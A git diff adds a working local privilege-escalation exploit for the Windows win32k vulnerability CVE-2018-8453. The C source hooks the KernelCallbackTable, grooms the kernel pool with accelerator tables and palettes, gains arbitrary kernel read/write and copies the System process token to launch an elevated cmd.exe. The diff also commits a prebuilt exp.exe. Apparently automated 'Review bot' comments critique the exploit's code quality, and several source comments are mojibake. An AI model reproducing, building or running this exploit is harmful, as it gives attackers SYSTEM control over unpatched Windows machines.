+HDC hKeepDC = NULL;
+PDWORD CallbackTb = 0;
+LPACCEL lpAccel;
+
+typedef VOID(WINAPI * fct_fnDispatch)(PDWORD msg);
+
+fct_fnDispatch fnDWORD;
+fct_fnDispatch fnClientFreeWindowClassExtraBytes;
+
+typedef struct
+{
+ DWORD UniqueProcessIdOffset;
+ DWORD TokenOffset;
+} VersionSpecificConfig;
+
+VersionSpecificConfig gConfig = { 0xb4, 0xfc }; // Win 10 15063 rs2 x86
+
+LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);
+INT_PTR CALLBACK About(HWND, UINT, WPARAM, LPARAM);
+
+void SetWindowFNID(HWND hWnd, DWORD FNID) {
+ __asm {
+ mov esi, esi;
+ mov eax, hWnd;
+ push FNID;
+ push eax;
+ push 0;
+ mov eax, 0x1202;
+ mov edx, SystemCallStub;
+ call edx;
+ add esp, 0x0c;
+ }
+}
+
+int SetLinkedUFIs(HDC hdc,int len) {
+ int retvalue;
+ __asm {
+ push len;
+ lea eax, flag;
+ PUSH eax;
+ push hdc;
+ push 0;
+ mov eax, 0x1023;
+ mov edx, SystemCallStub;
+ call edx;
+ add esp, 0x10;
+ mov retvalue, eax;
+ }
+ return retvalue;
+}
+
+DWORD buf[0x240];
+
+void ReadMem(DWORD Addr,DWORD len) {
+ memset(buf, 0, 0x240 * 4);
+ GetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+ buf[19] = Addr;
+ SetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+ GetPaletteEntries(hWorker, 0, len, (LPPALETTEENTRY)buf);
+}
+
+ULONG GetNTOsBase()
+{
+ ULONG Bases[0x1000];
+ DWORD needed = 0;
+ ULONG krnlbase = 0;
+ if (EnumDeviceDrivers((LPVOID *)&Bases, sizeof(Bases), &needed)) {
+ krnlbase = Bases[0];
+ }
+ return krnlbase;
+}
+
+DWORD_PTR PsInitialSystemProcess(VOID)
+{
+ ULONG Module = (ULONG)LoadLibraryA("ntoskrnl.exe");
+ ULONG Addr = (ULONG)GetProcAddress((HMODULE)Module, "PsInitialSystemProcess");
+ FreeLibrary((HMODULE)Module);
+ ULONG res = 0;
+ ULONG ntOsBase = GetNTOsBase();
+ if (ntOsBase) {
+ ReadMem(Addr - Module + ntOsBase, 16);
+ res = buf[0];
+ }
+ return res;
+}
+
+ULONG PsGetCurrentProcess(DWORD sysEPS)
+{
+ ULONG pEPROCESS = sysEPS;
+ ReadMem(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(ULONG), 16);
+ while (TRUE) {
+ pEPROCESS = buf[1] - gConfig.UniqueProcessIdOffset - sizeof(ULONG);
+ ReadMem(pEPROCESS + gConfig.UniqueProcessIdOffset, 16);
+ if (GetCurrentProcessId() == buf[0]) {
+ return pEPROCESS;
+ }
+ }
+}
+
+DWORD_PTR GetKernelHandleTable(VOID)
+{
+ ULONG Module = (ULONG)LoadLibraryA("ntoskrnl.exe");
+ ULONG Addr = (ULONG)GetProcAddress((HMODULE)Module, "KeServiceDescriptorTable");
+ FreeLibrary((HMODULE)Module);
+ ULONG res = 0;
+ ULONG DestroyAcceleratorTableAddr = 0;
+ ULONG HMValidateHandleAddr = 0;
+ ULONG ntOsBase = GetNTOsBase();
+ if (ntOsBase) {
+ //��ȻKeServiceDescriptorTableShadowδ����������λ��KeServiceDescriptorTable - 0x40�ĵط���
+ ReadMem(Addr - Module + ntOsBase - 0x40, 16 * 6);
+ //��ȡwin32k!NtUserDestroyAcceleratorTable������ַ
+ ReadMem(buf[4] + 0x500, 16);
+ ReadMem(buf[0] + 2, 16);
+ //��ȡwin32kfull!NtUserDestroyAcceleratorTable
+ ReadMem(buf[0], 16);
+ DestroyAcceleratorTableAddr = buf[0] + 0x18;
+ //��ȡwin32kfull!HMValidateHandle
+ ReadMem(DestroyAcceleratorTableAddr, 16);
+ //�ҵ�gpKernelHandleTable
+ HMValidateHandleAddr = DestroyAcceleratorTableAddr + buf[0] + 4 + 0x39;
+ ReadMem(HMValidateHandleAddr, 16);
+ ReadMem(buf[0], 16);
+ ReadMem(buf[0], 16);
+ res = buf[0];
+ }
+ return res;
+}
+
+HPALETTE CreatePaletteOfSize(int size,DWORD value) {
+ int pal_cnt = (size - 0x60) / 4;
+ int palsize = sizeof(LOGPALETTE) + (pal_cnt - 1) * sizeof(PALETTEENTRY);
+ LOGPALETTE *lPalette = (LOGPALETTE*)malloc(palsize);
+ memset(lPalette, value, palsize);
+ lPalette->palNumEntries = pal_cnt;
+ lPalette->palVersion = 0x300;
+ return CreatePalette(lPalette);
+}
+
+
+HACCEL hAccel_0xC10_top[2000];
+HACCEL hAccel_0x50_middle[3000];
+HACCEL hAccel_0x3B0_bottom[2000];
+HACCEL hAccel_ReusePalette[8000];
+HDC hDC_Writer[3000];
+HPALETTE hPalettes[10000];
+void BeforSBTrackAlloc() {
+
+ for (int i = 0; i < 3000; i++) {
+ hDC_Writer[i] = CreateCompatibleDC(NULL);
+ }
+
+ for (int i = 0; i < 2000; i++) {
+ hAccel_0xC10_top[i] = CreateAcceleratorTableW(lpAccel, 0x1FD);
+ }
+
+ for (int i = 0; i < 2000; i++) {
+ hAccel_0x3B0_bottom[i] = CreateAcceleratorTableW(lpAccel, 0x95);
+ }
+
+ for (int i = 0; i < 3000; i++) {
+ hAccel_0x50_middle[i] = CreateAcceleratorTableW(lpAccel, 8);
+ }
+ for (int i = 1000; i < 3000; i+=2) {
+ DestroyAcceleratorTable(hAccel_0x50_middle[i]);
+ }
+}
+
+void _cdecl AfterSBTrackAlloc() {
+ for (int i = 0; i < 3000; i++) {
+ DestroyAcceleratorTable(hAccel_0x50_middle[i]);
+ }
+ //������Ϣ,ϵͳ�ͷ�SBTrack;
+ SendMessage(hSBWNDnew, WM_CANCELMODE, 0, 0);
+ //�ͷ�0x3a0��ռ�ÿռ�,��0x3a0�������SBTrack(size=0x50)�ϲ�Ϊ0x3f0��С;
+ for (int i = 0; i < 2000; i++) {
+ DestroyAcceleratorTable(hAccel_0x3B0_bottom[i]);
+ }
+
+ for (int i = 0; i < 3000; i++) {
+ SetLinkedUFIs(hDC_Writer[i],0x7D);
+ }
+}
+
+void FindManagerAndWorker() {
+
+ for (int i = 0; i < 2000; i++) {
+ DestroyAcceleratorTable(hAccel_0xC10_top[i]);
+ }
+ for (int i = 0; i < 3000; i++) {
+ hPalettes[i] = CreatePaletteOfSize(0xb30, 0x66);
+ }
+ for (int i = 0; i < 2000; i++) {
+ hAccel_0x50_middle[i] = CreateAcceleratorTableW(lpAccel, 0x26);
+ }
+ for (int i = 3000; i < 10000; i++) {
+ hPalettes[i] = CreatePaletteOfSize(0x100, 0x88);
+ }
+ free(lpAccel);
+
+ *((DWORD *)flag) = 0x501;
+ *((DWORD *)flag + 1) = 0xFFFF;
+ for (int i = 0; i < 3000; i++) {
+ SetLinkedUFIs(hDC_Writer[i], 1);
+ }
+ memset(buf, 0, 0x240 * 4);
+ for (int i = 3000; i < 10000; i++) {
+ if (GetPaletteEntries(hPalettes[i], 0x2B, 80, (LPPALETTEENTRY)buf)) {
+ hKeep = hPalettes[i];
+ hManager = (HPALETTE)*buf;
+ hWorker = (HPALETTE)*(buf + 64);
+ *(buf + 5) = 0xFFFF;
+ *(buf + 69) = 0xFFFF;
+ SetPaletteEntries(hPalettes[i], 0x2B, 80, (LPPALETTEENTRY)buf);
+ }
+ }
+
+ *((DWORD *)flag) = 0x501;
+ *((DWORD *)flag + 1) = 0x28;
+ for (int i = 0; i < 3000; i++) {
+ SetLinkedUFIs(hDC_Writer[i], 1);
+ if (!hKeepDC && (!GetPaletteEntries(hKeep, 0x2B, 80, (LPPALETTEENTRY)buf))) {
+ hKeepDC = hDC_Writer[i];
+ }
+ }
+}
+
+void GetSystem() {
+ ULONG SelfToken = 0;
+ ULONG SystemToken = 0;
+ DWORD ACCELHandle = 0;
+ DWORD SystemEPS;
+ DWORD CurrentEPS;
+ DWORD pKernelHandleTable;
+
+ STARTUPINFO stStartUpInfo = { sizeof(stStartUpInfo) };
+ PROCESS_INFORMATION pProcessInfo;
+ WCHAR cmd[] = L"c:\\\\windows\\\\system32\\\\cmd.exe";
+
+ FindManagerAndWorker();
+ SystemEPS = PsInitialSystemProcess();
+ CurrentEPS = PsGetCurrentProcess(SystemEPS);
+ pKernelHandleTable = GetKernelHandleTable();
+
+ ReadMem(SystemEPS + gConfig.TokenOffset, 16);
+ SystemToken = buf[0];
+ GetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+ buf[19] = CurrentEPS + gConfig.TokenOffset;
+ SetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+
+ GetPaletteEntries(hWorker, 0, 1, (LPPALETTEENTRY)&SelfToken);
+ SetPaletteEntries(hWorker, 0, 1, (LPPALETTEENTRY)&SystemToken);
+
+ Sleep(500);
+ ZeroMemory(&stStartUpInfo, sizeof(STARTUPINFO));
+ stStartUpInfo.cb = sizeof(STARTUPINFO);
+ stStartUpInfo.dwFlags = STARTF_USESHOWWINDOW;
+ stStartUpInfo.wShowWindow = 1;
+ CreateProcess(cmd,NULL,NULL,NULL,FALSE,NULL,NULL,NULL,&stStartUpInfo,&pProcessInfo);
+ Sleep(1000);
+ SetPaletteEntries(hWorker, 0, 1, (LPPALETTEENTRY)&SelfToken);
+
+ for (int i = 3000; i < 10000; i++) {
+ if ((hPalettes[i] != hManager) && (hPalettes[i] != hWorker)) {
+ DeleteObject(hPalettes[i]);
+ }
+ }
+ for (int i = 0; i < 8000; i++) {
+ hAccel_ReusePalette[i] = CreateAcceleratorTableW(lpAccel, 0x22);
+ }
+
+ GetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+ ReadMem(buf[20] - 0x1f0, 16);
+ ACCELHandle = buf[0];
+ GetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+ buf[19] = pKernelHandleTable + (ACCELHandle & 0xffff) * 8;
+ SetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+
+ DeleteDC(hKeepDC);
+
+ buf[0] = 0;
+ buf[1] = 0;
+ SetPaletteEntries(hWorker, 0, 2, (LPPALETTEENTRY)buf);
+}
+
+void fnDWORDCallBack(PDWORD msg) {
+
+ if (bMSGSENT && *msg && (*((DWORD*)(*msg)) == (DWORD)hSBWND)) {
+ bMSGSENT = FALSE;
+ DestroyWindow(hMainWND);
+ }
+
+ //WM_TIMER��ʶScrollBar�Ѿ���ʼѭ��������Ϣ����ǿ���˳�xxxSBTrackLoop;
+ if (*msg && *(msg + 1) == WM_TIMER) {
+ SetCapture(hSBWNDnew);
+ }
+
+ if (*msg && (*(msg + 1) == 0x70) && (*((DWORD*)(*msg)) == (DWORD)hMainWND)) {
+ _asm pushad;
+ AfterSBTrackAlloc();
+ _asm popad;
+ }
+ fnDWORD(msg);
+}
+
+void fnClientFreeWindowClassExtraBytesCallBack(PDWORD msg) {
+
+ if ((HWND)*(msg + 3) == hMainWND) {
+ hSBWNDnew = CreateWindowEx(0, L"ScrollBar", L"SB", SWP_HIDEWINDOW | SB_HORZ, 0, 0, 0, 0, NULL, NULL, NULL, NULL);
+ SetWindowFNID(hMainWND, 0x2A1);
+ SetCapture(hSBWNDnew);
+ }
+ fnClientFreeWindowClassExtraBytes(msg);
+}
+
+LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
+{
+ return DefWindowProc(hWnd, message, wParam, lParam);
+}
+
+int APIENTRY wWinMain(_In_ HINSTANCE hInstance,
+ _In_opt_ HINSTANCE hPrevInstance,
+ _In_ LPWSTR lpCmdLine,
+ _In_ int nCmdShow)
+{
+
+ DWORD OldProtect = 0;
+ _asm {
+ push eax;
+ mov eax, fs:[0x30];
+ lea eax, [eax + 0x2c];
+ mov eax, [eax];
+ mov CallbackTb, eax;
+ pop eax;
+ }
+ VirtualProtect(CallbackTb, 512, PAGE_READWRITE, &OldProtect);
+ CallbackTb += 2;
+ fnDWORD = (fct_fnDispatch)*CallbackTb;
+ *CallbackTb = (DWORD)fnDWORDCallBack;
+
+ CallbackTb += 126;
+ fnClientFreeWindowClassExtraBytes = (fct_fnDispatch)*CallbackTb;
+ *CallbackTb = (DWORD)fnClientFreeWindowClassExtraBytesCallBack;
+
+ VirtualProtect(CallbackTb, 512, OldProtect, &OldProtect);
+ SystemCallStub = (DWORD)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "KiFastSystemCall");
+ lpAccel= (LPACCEL)malloc(sizeof(ACCEL) * 2);
+ SecureZeroMemory(lpAccel, sizeof(ACCEL));
+
+ WNDCLASSEXW wcex;
+ wcex.cbSize = sizeof(WNDCLASSEX);
+ wcex.style = CS_HREDRAW | CS_VREDRAW;
+ wcex.lpfnWndProc = WndProc;
+ wcex.cbClsExtra = 0;
+ wcex.cbWndExtra = 1;
+ wcex.hInstance = hInstance;
+ wcex.hIcon = LoadIcon(hInstance, MAKEINTRESOURCE(IDI_CVE8453));
+ wcex.hCursor = LoadCursor(nullptr, IDC_ARROW);
+ wcex.hbrBackground = (HBRUSH)(COLOR_WINDOW + 1);
+ wcex.lpszMenuName = NULL;
+ wcex.lpszClassName = L"WNDCLASSMAIN";
+ wcex.hIconSm = LoadIcon(wcex.hInstance, MAKEINTRESOURCE(IDI_SMALL));
+
+ RegisterClassExW(&wcex);
+ HACCEL hAccelTable = LoadAccelerators(hInstance, MAKEINTRESOURCE(IDC_CVE8453));
+
+ hMainWND = CreateWindowW(L"WNDCLASSMAIN", L"CVE", WS_DISABLED , 0, 0, 0, 0,nullptr, nullptr, hInstance, nullptr);
+
+ hSBWND = CreateWindowEx(0, L"ScrollBar", L"SB", WS_CHILD | WS_VISIBLE | SBS_HORZ, 0, 0, 3, 3, hMainWND, NULL, hInstance, NULL);
+ SetScrollRange(hSBWND, SB_CTL, 0, 3, TRUE);
+ SetScrollPos(hSBWND, SB_CTL, 3, TRUE);
+ ShowWindow(hMainWND, SW_SHOW);
+ UpdateWindow(hMainWND);
+
+ ///////////////////////////////////////////////////////////////////////////////////
+ //��ռ�þ��������֮��ijط�ˮ�ᱻ����2������������Ҳ���
+ for (int i = 0; i < 10000; i++) {
+ hPalettes[i] = CreatePaletteOfSize(0x100, 0x11);
+ }
+ for (int i = 9990; i >= 0; i--) {
+ DeleteObject(hPalettes[i]);
+ }
+ ///////////////////////////////////////////////////////////////////////////////////
+
+ BeforSBTrackAlloc();
+ bMSGSENT = TRUE;
+ SendMessage(hSBWND, WM_LBUTTONDOWN, 0, 0x00020002);
+
+ GetSystem();
+
+ return TRUE;
+}
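Review bot: the protection restore `VirtualProtect(CallbackTb, 512, OldProtect, &OldProtect);` near the top of `wWinMain` does not cover the range that was made writable: between the two calls `CallbackTb` is advanced by 2 + 126 DWORDs (512 bytes), so the second call restores protection on the next 512-byte range, and whether the KernelCallbackTable entries that were actually patched get their original protection back depends only on page alignment; keep a copy of the original pointer and restore at that address. Two smaller items in the same function: `lpAccel` is allocated as `sizeof(ACCEL) * 2` but `SecureZeroMemory(lpAccel, sizeof(ACCEL));` clears only the first entry, and it is never freed; `hAccelTable` from `LoadAccelerators` is assigned and never used.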
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.h b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.h
new file mode 100644
index 0000000..d00d47e
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.h
@@ -0,0 +1,3 @@
+#pragma once
+
+#include "resource.h"
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.ico b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.ico
new file mode 100644
index 0000000..b3ec03b
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.ico differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.rc b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.rc
new file mode 100644
index 0000000..26c47ab
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.rc differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.vcxproj b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.vcxproj
new file mode 100644
index 0000000..830e03d
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.vcxproj
@@ -0,0 +1,173 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ x64
+
+
+
+ {9EAE33EA-0B19-4794-B231-0D53D802B882}
+ Win32Proj
+ cve8453
+ 8.1
+
+
+
+ Application
+ true
+ v140
+ Unicode
+
+
+ Application
+ false
+ v140
+ true
+ Unicode
+
+
+ Application
+ true
+ v140
+ Unicode
+
+
+ Application
+ false
+ v140
+ true
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ true
+
+
+ true
+
+
+ false
+
+
+ false
+
+
+
+ Use
+ Level3
+ Disabled
+ WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
+ true
+
+
+ Windows
+ true
+
+
+
+
+ Use
+ Level3
+ Disabled
+ _DEBUG;_WINDOWS;%(PreprocessorDefinitions)
+ true
+
+
+ Windows
+ true
+
+
+
+
+ Level3
+ Use
+ MaxSpeed
+ true
+ true
+ WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+
+
+ Windows
+ true
+ true
+ true
+
+
+
+
+ Level3
+ Use
+ MaxSpeed
+ true
+ true
+ NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
+ true
+
+
+ Windows
+ true
+ true
+ true
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Create
+ Create
+ Create
+ Create
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
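Review bot: the Debug|x64 and Release|x64 configurations declared in this project file cannot build the accompanying source: cve8453.cpp relies on 32-bit inline assembly (`_asm { ... mov eax, fs:[0x30]; ... mov CallbackTb, eax; }`), which the MSVC x64 compiler does not support, and it indexes the callback table as `PDWORD` and casts function pointers to `DWORD` (`*CallbackTb = (DWORD)fnDWORDCallBack;`), which only holds for 4-byte pointers. Either remove the x64 platform entries or state in the project and README that Win32 is the only valid target, as the directory name `exp-x86_pool_fengshui` already implies.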
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.vcxproj.filters b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.vcxproj.filters
new file mode 100644
index 0000000..7c753b2
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.vcxproj.filters
@@ -0,0 +1,55 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;hm;inl;inc;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+
+
+
+
+
+ 头文件
+
+
+ 头文件
+
+
+ 头文件
+
+
+ 头文件
+
+
+
+
+ 源文件
+
+
+ 源文件
+
+
+
+
+ 资源文件
+
+
+
+
+ 资源文件
+
+
+ 资源文件
+
+
+
\ No newline at end of file
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/small.ico b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/small.ico
new file mode 100644
index 0000000..b3ec03b
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/small.ico differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/stdafx.cpp b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/stdafx.cpp
new file mode 100644
index 0000000..1dc109b
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/stdafx.cpp
@@ -0,0 +1,8 @@
+// stdafx.cpp : ֻ�����������ļ���Դ�ļ�
+// cve8453.pch ����ΪԤ����ͷ
+// stdafx.obj ������Ԥ����������Ϣ
+
+#include "stdafx.h"
+
+// TODO: �� STDAFX.H �������κ�����ĸ���ͷ�ļ���
+//�������ڴ��ļ�������
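Review bot: the comments in this file, and likewise in cve8453.cpp, stdafx.h and targetver.h, are stored in a locale-specific code page and render as mojibake (`// stdafx.cpp : ֻ�����������ļ���Դ�ļ�`) on any system not using that locale. Save the sources as UTF-8 with BOM, which MSVC reads correctly; the comments lost this way include the explanatory notes beside the pool-layout and callback code, which are exactly the ones a reviewer needs.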
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/stdafx.h b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/stdafx.h
new file mode 100644
index 0000000..8be11dc
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/stdafx.h
@@ -0,0 +1,25 @@
+// stdafx.h : ��ϵͳ�����ļ��İ����ļ���
+// ���Ǿ���ʹ�õ��������ĵ�
+// �ض�����Ŀ�İ����ļ�
+//
+
+#pragma once
+
+#include "targetver.h"
+
+#define WIN32_LEAN_AND_MEAN // �� Windows ͷ���ų�����ʹ�õ�����
+// Windows ͷ�ļ�:
+#include
+
+// C ����ʱͷ�ļ�
+#include
+#include
+#include
+#include
+
+#define _ATL_CSTRING_EXPLICIT_CONSTRUCTORS // ijЩ CString ���캯��������ʽ��
+
+#include
+#include
+
+// TODO: �ڴ˴����ó�����Ҫ������ͷ�ļ�
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/targetver.h b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/targetver.h
new file mode 100644
index 0000000..416cebf
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/targetver.h
@@ -0,0 +1,8 @@
+#pragma once
+
+// ���� SDKDDKVer.h ��������õ���߰汾�� Windows ƽ̨��
+
+// ���ҪΪ��ǰ�� Windows ƽ̨����Ӧ�ó�������� WinSDKVer.h������
+// �� _WIN32_WINNT ������ΪҪ֧�ֵ�ƽ̨��Ȼ���ٰ��� SDKDDKVer.h��
+
+#include
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/ipch/CVE8453-936c78b8/CVE8453-d4e35df8.ipch b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/ipch/CVE8453-936c78b8/CVE8453-d4e35df8.ipch
new file mode 100644
index 0000000..0a9ee82
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/ipch/CVE8453-936c78b8/CVE8453-d4e35df8.ipch differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/ipch/CVE8453-f57da282/CVE8453-24ae4e3e.ipch b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/ipch/CVE8453-f57da282/CVE8453-24ae4e3e.ipch
new file mode 100644
index 0000000..af45c59
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/ipch/CVE8453-f57da282/CVE8453-24ae4e3e.ipch differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/ipch/CVE8453-f57da282/CVE8453-d4e35df8.ipch b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/ipch/CVE8453-f57da282/CVE8453-d4e35df8.ipch
new file mode 100644
index 0000000..2a56886
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/ipch/CVE8453-f57da282/CVE8453-d4e35df8.ipch differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/.vs/exp/v14/.suo b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/.vs/exp/v14/.suo
new file mode 100644
index 0000000..7cd6117
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/.vs/exp/v14/.suo differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/Release/exp.exe b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/Release/exp.exe
new file mode 100644
index 0000000..af76273
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/Release/exp.exe differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp.VC.db b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp.VC.db
new file mode 100644
index 0000000..be9f0b2
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp.VC.db differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp.sln b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp.sln
new file mode 100644
index 0000000..12f7ad4
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp.sln
@@ -0,0 +1,28 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 14
+VisualStudioVersion = 14.0.25420.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "exp", "exp\exp.vcxproj", "{28183B36-FF5A-4240-9BBC-60E767FADB82}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|x64 = Debug|x64
+ Debug|x86 = Debug|x86
+ Release|x64 = Release|x64
+ Release|x86 = Release|x86
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {28183B36-FF5A-4240-9BBC-60E767FADB82}.Debug|x64.ActiveCfg = Debug|x64
+ {28183B36-FF5A-4240-9BBC-60E767FADB82}.Debug|x64.Build.0 = Debug|x64
+ {28183B36-FF5A-4240-9BBC-60E767FADB82}.Debug|x86.ActiveCfg = Debug|Win32
+ {28183B36-FF5A-4240-9BBC-60E767FADB82}.Debug|x86.Build.0 = Debug|Win32
+ {28183B36-FF5A-4240-9BBC-60E767FADB82}.Release|x64.ActiveCfg = Release|x64
+ {28183B36-FF5A-4240-9BBC-60E767FADB82}.Release|x64.Build.0 = Release|x64
+ {28183B36-FF5A-4240-9BBC-60E767FADB82}.Release|x86.ActiveCfg = Release|Win32
+ {28183B36-FF5A-4240-9BBC-60E767FADB82}.Release|x86.Build.0 = Release|Win32
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+EndGlobal
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.Build.CppClean.log b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.Build.CppClean.log
new file mode 100644
index 0000000..317b5ab
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.Build.CppClean.log
@@ -0,0 +1,14 @@
+c:\users\ze0r\desktop\exp\exp\debug\exp.pch
+c:\users\ze0r\desktop\exp\exp\debug\vc140.pdb
+c:\users\ze0r\desktop\exp\exp\debug\vc140.idb
+c:\users\ze0r\desktop\exp\exp\debug\stdafx.obj
+c:\users\ze0r\desktop\exp\exp\debug\exp.obj
+c:\users\ze0r\desktop\exp\debug\exp.ilk
+c:\users\ze0r\desktop\exp\debug\exp.exe
+c:\users\ze0r\desktop\exp\debug\exp.pdb
+c:\users\ze0r\desktop\exp\exp\debug\exp.tlog\cl.command.1.tlog
+c:\users\ze0r\desktop\exp\exp\debug\exp.tlog\cl.read.1.tlog
+c:\users\ze0r\desktop\exp\exp\debug\exp.tlog\cl.write.1.tlog
+c:\users\ze0r\desktop\exp\exp\debug\exp.tlog\link.command.1.tlog
+c:\users\ze0r\desktop\exp\exp\debug\exp.tlog\link.read.1.tlog
+c:\users\ze0r\desktop\exp\exp\debug\exp.tlog\link.write.1.tlog
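Review bot: this commit adds local build output that does not belong in source control: the Debug/ and Release/ trees (.obj, .pch, .pdb, .idb, .tlog, .log and the prebuilt exp.exe), plus .vs/exp/v14/.suo, exp.VC.db and the ipch/ caches. They embed the developer's local paths (`c:\users\ze0r\desktop\exp\...`), change on every rebuild, and a committed executable is the kind of file downstream scanners quarantine, which then breaks checkout for anyone studying the source. Add a .gitignore for these directories and remove the artifacts from the commit.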
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.log b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.log
new file mode 100644
index 0000000..d66af6e
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.log
@@ -0,0 +1,3 @@
+ exp.cpp
+ exp.vcxproj -> c:\users\ze0r\desktop\exp\Debug\exp.exe
+ exp.vcxproj -> c:\users\ze0r\desktop\exp\Debug\exp.pdb (Full PDB)
